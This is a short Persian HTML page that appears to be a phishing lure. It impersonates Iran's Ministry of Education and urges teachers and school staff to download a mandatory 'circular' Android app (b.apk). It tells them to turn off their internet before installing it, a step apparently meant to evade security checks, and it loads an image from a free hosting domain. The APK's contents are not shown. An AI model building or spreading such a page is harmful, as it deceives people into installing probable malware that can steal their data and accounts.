<!DOCTYPE html>
<html lang="en" dir="rtl">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
    <style>
        @font-face {
    font-family: "dana";
    src: url("fonts/Dana-Light.woff2") format("woff2");
}

* {
    margin: auto;
    margin-left: auto;
    text-align: center;
    align-items: center;



}

body {
    font-family: "dana";
    align-items: center;

}

img {
    width: 370px;
    margin-top: 10px
}

a {
    text-decoration: none;
}


a:link, a:visited {
    background-color: #595ff3;
    color: white;
    padding: 7px 25px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    border-radius: 10px;
    margin-top: 15px;
}

a:hover,
a:active {
    background-color: #595ff3;
}
    </style>
</head>

<body>
    <h4>وزارت اموزش و پرورش</h4>
    <img src="http://xivici.byethost22.com/medu-shad/img/2.jpg" alt="imge">
    <h2>بخشنامه اتوماسیون</h2>
    <br>
    <p>جهت دریافت بخشنامه بر روی دانلود زیر کلیک کنید تا عملیات دانلود شروع شود</p>
    <h5>مهم: برنامه رسمی سامانه مای مدیو جهت دریافت بخشنامه برای تمامی فرهنگیان ععم از مدیران معلمان و معاونین الزامی  میباشد</h5>
    <h5><mark>نکته مهم:</mark> حتما قبل از نصب برنامه بخشنامه اینترنت خود را خاموش کنید وگرنه با مشکل مواجه خواهید شد .</h5>
    <h5> و موقع ورود به برنامه و دریافت بخشنامه اینترنت خود را روشن کنید </h5>
    <br>
    <label>دانلود اپلیکیشن :</label>
    <a href="b.apk" download="بخشنامه">دانلود</a>
</body>
<script>
    function help() {
        alert("راهنمای نصب بخشنامه: بر روی دانلود درون وبسایت ضربه بزنید و منتظر بمانید تا برنامه دانلود شود سپس برنامه را نصب کرده و طبق اموزش داخل اپلیکیشن عمل کنید ./ باتشکر");

    }
</script>

</html>